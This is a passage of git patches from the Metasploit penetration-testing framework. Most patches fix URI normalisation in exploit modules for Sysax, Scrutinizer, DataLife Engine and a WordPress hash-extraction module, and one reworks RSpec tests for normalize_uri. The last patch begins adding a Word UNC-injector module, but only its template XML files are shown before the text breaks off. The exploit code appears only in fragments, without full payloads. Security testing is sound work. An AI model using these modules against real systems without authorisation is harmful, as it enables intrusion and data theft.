100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb @@ -126,12 +126,12 @@ def get_sid pass = datastore['SysaxPASS'] creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}" - uri = target_uri.to_s + uri = target_uri.path # Login to get SID value r = send_request_cgi({ 'method' => "POST", - 'uri' => normalize_uri("#{uri}/scgi?sid=0&pid=dologin"), - 'data' => creds + 'uri' => normalize_uri("#{uri}/scgi?sid=0&pid=dologin"), + 'data' => creds }) # Parse response for SID token @@ -146,7 +146,7 @@ def get_root_path(sid) # Find the path because it's used to help calculate the offset random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir - uri normalize_uri(target_uri.to_s) + uri = normalize_uri(target_uri.path) r = send_request_cgi({ 'uri' => normalize_uri("#{uri}/scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm"), 'method' => 'POST', @@ -182,7 +182,7 @@ def exploit post_data = Rex::MIME::Message.new post_data.add_part(buffer, nil, nil, "form-data; name=\"e2\"") post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669" - uri = normalize_uri(target_uri.to_s) + uri = normalize_uri(target_uri.path) r = send_request_cgi({ 'uri' => normalize_uri("#{uri}/scgi?sid=#{sid}&pid=mk_folder2_name1.htm"), 'method' => 'POST', diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb index 641783f5a31d..e1f1e509439f 100644 --- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb +++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb @@ -72,7 +72,7 @@ def initialize(info={}) def check tmp_rport = datastore['RPORT'] - uri = normalize_uri(target_uri.host) + uri = normalize_uri(target_uri.path) uri << '/' if uri[-1,1] != '/' datastore['RPORT'] = datastore['HTTPPORT'] res = send_request_raw({'uri'=>uri}) From 1a01d6d033acd8522d6eb216c4ae8c7ed5f1f8fa Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 31 Jan 2013 14:48:54 -0600 Subject: [PATCH 213/421] Fix scrutinizer checks --- modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb | 2 +- modules/exploits/windows/mysql/scrutinizer_upload_exec.rb | 4 +--- 2 files changed, 2 insertions(+), 4 deletions(-) diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb index e38a0979c8a6..34857f9f84e1 100644 --- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb +++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb @@ -62,7 +62,7 @@ def initialize(info={}) def check - res = send_request_raw({'uri'=>normalize_uri(target_uri.path)}) + res = send_request_raw({'uri'=>'/'}) # Check the base path for version regex if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-1]\<\/div\>/ return Exploit::CheckCode::Vulnerable diff --git a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb index e1f1e509439f..135132c9b65e 100644 --- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb +++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb @@ -72,10 +72,8 @@ def initialize(info={}) def check tmp_rport = datastore['RPORT'] - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1,1] != '/' datastore['RPORT'] = datastore['HTTPPORT'] - res = send_request_raw({'uri'=>uri}) + res = send_request_raw({'uri'=>'/'}) #Check the base path for regex datastore['RPORT'] = tmp_rport if res and res.body =~ /\<title\>Scrutinizer\<\/title\>/ and res.body =~ /\<div id\=\'.+\'\>Scrutinizer 9\.[0-5]\.[0-2]\<\/div\>/ From 39cdb89831e1c4005a0951a44cde75a17612c1e2 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 31 Jan 2013 15:04:13 -0600 Subject: [PATCH 214/421] Oh don't be so sensitive about it. Fixnum vs String --- modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb index b677c8776319..e03844bf80eb 100644 --- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb +++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb @@ -62,7 +62,7 @@ def cache_user_info(user_id) "uri" => user_url, "method" => "GET", "vars_get" => { - "author" => user_id + "author" => user_id.to_s } }) From 9d4bc6bb895f716cf57e348f16bb37323ce81713 Mon Sep 17 00:00:00 2001 From: egypt <egypt@metasploit.com> Date: Thu, 31 Jan 2013 15:29:30 -0600 Subject: [PATCH 215/421] Restructure a bit and add checks for doubled '//' --- spec/lib/msf/core/exploit/http/client_spec.rb | 133 ++++++++++-------- 1 file changed, 78 insertions(+), 55 deletions(-) diff --git a/spec/lib/msf/core/exploit/http/client_spec.rb b/spec/lib/msf/core/exploit/http/client_spec.rb index d32ce9e12216..93180d3a5a72 100644 --- a/spec/lib/msf/core/exploit/http/client_spec.rb +++ b/spec/lib/msf/core/exploit/http/client_spec.rb @@ -11,7 +11,7 @@ mod end - context 'normalize_uri' do + describe '#normalize_uri' do let(:expected_normalized_uri) do '/a/b/c' end @@ -20,6 +20,20 @@ subject.normalize_uri(unnormalized_uri) end + context "with just '/'" do + let(:unnormalized_uri) do + '/' + end + + it "should be '/'" do + unnormalized_uri.should == '/' + end + + it "should return '/'" do + normalized_uri.should == '/' + end + end + context "with starting '/'" do let(:unnormalized_uri) do expected_normalized_uri @@ -30,7 +44,17 @@ end it "should not add another starting '/'" do - normalized_uri.should == expected_normalized_uri + normalized_uri.should == expected_normalized_uri + end + + context "with multiple internal '/'" do + let(:unnormalized_uri) do + "/#{expected_normalized_uri.gsub("/", "////")}" + end + + it "should remove doubled internal '/'" do + normalized_uri.should == expected_normalized_uri + end end context "with multiple starting '/'" do @@ -48,39 +72,25 @@ end context "with trailing '/'" do - let(:unnormalized_uri) do - "#{expected_normalized_uri}/" + let(:expected_normalized_uri) do + '/a/b/c/' end - it "should end with '/'" do - unnormalized_uri[-1, 1].should == '/' + let(:unnormalized_uri) do + "#{expected_normalized_uri}/" end it "should end with '/'" do normalized_uri[-1, 1].should == '/' end - context "with just '/'" do - let(:unnormalized_uri) do - '/' - end - - it "should be '/'" do - unnormalized_uri.should == '/' - end - - it "should return '/'" do - normalized_uri.should == '/' - end - end - - context "with multiple multiple trailing '/'" do + context "with multiple trailing '/'" do let(:unnormalized_uri) do - "#{expected_normalized_uri}" + "#{expected_normalized_uri}/" end - it "should have single trailing '/'" do - unnormalized_uri[-2,1].should == '/' + it "should have multiple trailing '/'" do + unnormalized_uri[-2,2].should == '//' end it "should return only one trailing '/'" do @@ -105,16 +115,15 @@ end context "without starting '/'" do - let(:unnormalized_uri) do - 'a/b/c' - end - context "with trailing '/'" do let(:unnormalized_uri) do 'a/b/c/' end + let(:expected_normalized_uri) do + '/a/b/c/' + end - it "'should have trailing '/'" do + it "should have trailing '/'" do unnormalized_uri[-1, 1].should == '/' end @@ -122,17 +131,31 @@ normalized_uri[0, 1].should == '/' end - it "'should not remove trailing '/'" do + it "should not remove trailing '/'" do normalized_uri[-1, 1].should == '/' end it 'should normalize the uri' do - normalized_uri.should == "#{expected_normalized_uri}/" + normalized_uri.should == "#{expected_normalized_uri}" + end + + context "with multiple internal '/'" do + let(:unnormalized_uri) do + "/#{expected_normalized_uri.gsub("/", "////")}" + end + + it "should remove doubled internal '/'" do + normalized_uri.should == expected_normalized_uri + end end end context "without trailing '/'" do - it "'should not have trailing '/'" do + let(:unnormalized_uri) do + 'a/b/c' + end + + it "should not have trailing '/'" do unnormalized_uri[-1, 1].should_not == '/' end @@ -143,35 +166,35 @@ it "should add trailing '/'" do normalized_uri[-1, 1].should_not == '/' end + end + end - context 'with empty string' do - let(:unnormalized_uri) do - '' - end + context 'with empty string' do + let(:unnormalized_uri) do + '' + end - it "should be empty" do - unnormalized_uri.should be_empty - end + it "should be empty" do + unnormalized_uri.should be_empty + end - it "should return '/'" do - normalized_uri.should == '/' - end - end + it "should return '/'" do + normalized_uri.should == '/' + end + end - context 'with nil' do - let(:unnormalized_uri) do - nil - end + context 'with nil' do + let(:unnormalized_uri) do + nil + end - it 'should be nil' do - unnormalized_uri.should be_nil - end + it 'should be nil' do + unnormalized_uri.should be_nil + end - it "should return '/" do - normalized_uri.should == '/' - end - end + it "should return '/" do + normalized_uri.should == '/' end end end -end \ No newline at end of file +end From de8572d934fe21eebb5b9cdd3ae00386307f77a0 Mon Sep 17 00:00:00 2001 From: sinn3r <msfsinn3r@gmail.com> Date: Thu, 31 Jan 2013 16:57:48 -0600 Subject: [PATCH 216/421] Use normalize_uri for URI --- modules/exploits/unix/webapp/datalife_preview_exec.rb | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb index 6a120a8a3141..e1339f1313cb 100644 --- a/modules/exploits/unix/webapp/datalife_preview_exec.rb +++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb @@ -53,17 +53,15 @@ def initialize(info = {}) ], self.class) end - def base - base = normalize_uri(target_uri.path) - base << '/' if base[-1, 1] != '/' - return base + def uri + normalize_uri(target_uri.path, 'engine', 'preview.php') end def check fingerprint = rand_text_alpha(4+rand(4)) res = send_request_cgi( { - 'uri' => "#{base}engine/preview.php", + 'uri' => uri, 'method' => 'POST', 'vars_post' => { @@ -84,7 +82,7 @@ def exploit print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code") res = send_request_cgi( { - 'uri' => "#{base}engine/preview.php", + 'uri' => uri, 'method' => 'POST', 'vars_post' => { From e71c2c5ece97c8a237186eeaab46526be28b2cb3 Mon Sep 17 00:00:00 2001 From: SphaZ <cyberphaz@gmail.com> Date: Fri, 1 Feb 2013 08:03:41 +0100 Subject: [PATCH 217/421] added word_unc_injector auxiliary module --- .../docx/sourcedoc/[Content_Types].xml | 2 + modules/auxiliary/docx/sourcedoc/_rels/.rels | 2 + .../auxiliary/docx/sourcedoc/docProps/app.xml | 2 + .../sourcedoc/word/_rels/document.xml.rels | 2 + .../docx/sourcedoc/word/document.xml | 2 + .../docx/sourcedoc/word/fontTable.xml | 2 + .../docx/sourcedoc/word/settings.xml | 2 + .../auxiliary/docx/sourcedoc/word/styles.xml | 2 + .../docx/sourcedoc/word/theme/theme1.xml | 2 + .../docx/sourcedoc/word/webSettings.xml | 2 + modules/auxiliary/docx/word_unc_injector.rb | 320 ++++++++++++++++++ 11 files changed, 340 insertions(+) create mode 100644 modules/auxiliary/docx/sourcedoc/[Content_Types].xml create mode 100644 modules/auxiliary/docx/sourcedoc/_rels/.rels create mode 100644 modules/auxiliary/docx/sourcedoc/docProps/app.xml create mode 100644 modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels create mode 100644 modules/auxiliary/docx/sourcedoc/word/document.xml create mode 100644 modules/auxiliary/docx/sourcedoc/word/fontTable.xml create mode 100644 modules/auxiliary/docx/sourcedoc/word/settings.xml create mode 100644 modules/auxiliary/docx/sourcedoc/word/styles.xml create mode 100644 modules/auxiliary/docx/sourcedoc/word/theme/theme1.xml create mode 100644 modules/auxiliary/docx/sourcedoc/word/webSettings.xml create mode 100644 modules/auxiliary/docx/word_unc_injector.rb diff --git a/modules/auxiliary/docx/sourcedoc/[Content_Types].xml b/modules/auxiliary/docx/sourcedoc/[Content_Types].xml new file mode 100644 index 000000000000..39a9cb897f0e --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/[Content_Types].xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/><Override PartName="/word/styles.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.styles+xml"/><Override PartName="/docProps/app.xml" ContentType="application/vnd.openxmlformats-officedocument.extended-properties+xml"/><Override PartName="/word/settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.settings+xml"/><Override PartName="/word/theme/theme1.xml" ContentType="application/vnd.openxmlformats-officedocument.theme+xml"/><Override PartName="/word/fontTable.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.fontTable+xml"/><Override PartName="/word/webSettings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.webSettings+xml"/><Override PartName="/docProps/core.xml" ContentType="application/vnd.openxmlformats-package.core-properties+xml"/></Types> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/_rels/.rels b/modules/auxiliary/docx/sourcedoc/_rels/.rels new file mode 100644 index 000000000000..fdd8c4f37126 --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/_rels/.rels @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/extended-properties" Target="docProps/app.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/package/2006/relationships/metadata/core-properties" Target="docProps/core.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/></Relationships> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/docProps/app.xml b/modules/auxiliary/docx/sourcedoc/docProps/app.xml new file mode 100644 index 000000000000..1f971257721b --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/docProps/app.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"><Template>hoi.dot</Template><TotalTime>0</TotalTime><Pages>1</Pages><Words>0</Words><Characters>3</Characters><Application>Microsoft Office Outlook</Application><DocSecurity>0</DocSecurity><Lines>0</Lines><Paragraphs>0</Paragraphs><ScaleCrop>false</ScaleCrop><Company></Company><LinksUpToDate>false</LinksUpToDate><CharactersWithSpaces>0</CharactersWithSpaces><SharedDoc>false</SharedDoc><HyperlinksChanged>false</HyperlinksChanged><AppVersion>12.0000</AppVersion></Properties> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels b/modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels new file mode 100644 index 000000000000..0079d06931a7 --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/word/_rels/document.xml.rels @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/></Relationships> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/document.xml b/modules/auxiliary/docx/sourcedoc/word/document.xml new file mode 100644 index 000000000000..6e291134c2fa --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/word/document.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml"><w:body><w:p w:rsidR="00E97639" w:rsidRDefault="00E97639"><w:r><w:t>hoi</w:t></w:r></w:p><w:sectPr w:rsidR="00E97639" w:rsidSect="00B25E88"><w:pgSz w:w="12240" w:h="15840"/><w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/><w:cols w:space="720"/><w:docGrid w:linePitch="360"/></w:sectPr></w:body></w:document> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/fontTable.xml b/modules/auxiliary/docx/sourcedoc/word/fontTable.xml new file mode 100644 index 000000000000..20e9a398fef8 --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/word/fontTable.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:font w:name="Times New Roman"><w:panose1 w:val="02020603050405020304"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="20002A87" w:usb1="80000000" w:usb2="00000008" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/></w:font><w:font w:name="Cambria"><w:panose1 w:val="02040503050406030204"/><w:charset w:val="00"/><w:family w:val="roman"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000004B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font><w:font w:name="Calibri"><w:panose1 w:val="020F0502020204030204"/><w:charset w:val="00"/><w:family w:val="swiss"/><w:pitch w:val="variable"/><w:sig w:usb0="A00002EF" w:usb1="4000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/></w:font></w:fonts> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/settings.xml b/modules/auxiliary/docx/sourcedoc/word/settings.xml new file mode 100644 index 000000000000..4692c237a851 --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/word/settings.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main"><w:zoom w:percent="100"/><w:embedSystemFonts/><w:attachedTemplate r:id="rId1"/><w:defaultTabStop w:val="720"/><w:characterSpacingControl w:val="doNotCompress"/><w:doNotValidateAgainstSchema/><w:doNotDemarcateInvalidXml/><w:compat><w:useNormalStyleForList/><w:doNotUseIndentAsNumberingTabStop/><w:useAltKinsokuLineBreakRules/><w:allowSpaceOfSameStyleInTable/><w:doNotSuppressIndentation/><w:doNotAutofitConstrainedTables/><w:autofitToFirstFixedWidthCell/><w:underlineTabInNumList/><w:displayHangulFixedWidth/><w:splitPgBreakAndParaMark/><w:doNotVertAlignCellWithSp/><w:doNotBreakConstrainedForcedTable/><w:doNotVertAlignInTxbx/><w:useAnsiKerningPairs/><w:cachedColBalance/></w:compat><w:rsids><w:rsidRoot w:val="00B25E88"/><w:rsid w:val="00890656"/><w:rsid w:val="00B25E88"/><w:rsid w:val="00E97639"/></w:rsids><m:mathPr><m:mathFont m:val="Cambria Math"/><m:brkBin m:val="before"/><m:brkBinSub m:val="--"/><m:smallFrac m:val="off"/><m:dispDef/><m:lMargin m:val="0"/><m:rMargin m:val="0"/><m:defJc m:val="centerGroup"/><m:wrapIndent m:val="1440"/><m:intLim m:val="subSup"/><m:naryLim m:val="undOvr"/></m:mathPr><w:uiCompat97To2003/><w:themeFontLang w:val="en-US"/><w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/><w:doNotIncludeSubdocsInStats/><w:doNotAutoCompressPictures/><w:decimalSymbol w:val="."/><w:listSeparator w:val=","/></w:settings> \ No newline at end of file diff --git a/modules/auxiliary/docx/sourcedoc/word/styles.xml b/modules/auxiliary/docx/sourcedoc/word/styles.xml new file mode 100644 index 000000000000..4a084626fc28 --- /dev/null +++ b/modules/auxiliary/docx/sourcedoc/word/styles.xml @@ -0,0 +1,2 @@ +<?xml version="1.0" encoding="UTF-8" standalone="yes"?> +<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:docDefaults><w:rPrDefault><w:rPr><w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/><w:sz w:val="22"/><w:szCs w:val="22"/><w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/></w:rPr></w:rPrDefault><w:pPrDefault/></w:docDefaults><w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267"><w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/><w:lsdException w:name="toc 1" w:uiPriority="39"/><w:lsdException w:name="toc 2" w:uiPriority="39"/><w:lsdException w:name="toc 3" w:uiPriority="39"/><w:lsdException w:name="toc 4" w:uiPriority="39"/><w:lsdException w:name="toc 5" w:uiPriority="39"/><w:lsdException w:name="toc 6" w:uiPriority="39"/><w:lsdException w:name="toc 7" w:uiPriority="39"/><w:lsdException w:name="toc 8" w:uiPriority="39"/><w:lsdException w:name="toc 9" w:uiPriority="39"/><w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/><w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/><w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/><w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/><w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Revision" w:unhideWhenUsed="0"/><w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/><w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/><w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/><w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/><w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/><w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/><w:lsdException w:name="Light List Accent 3" w:semiHidden="0" 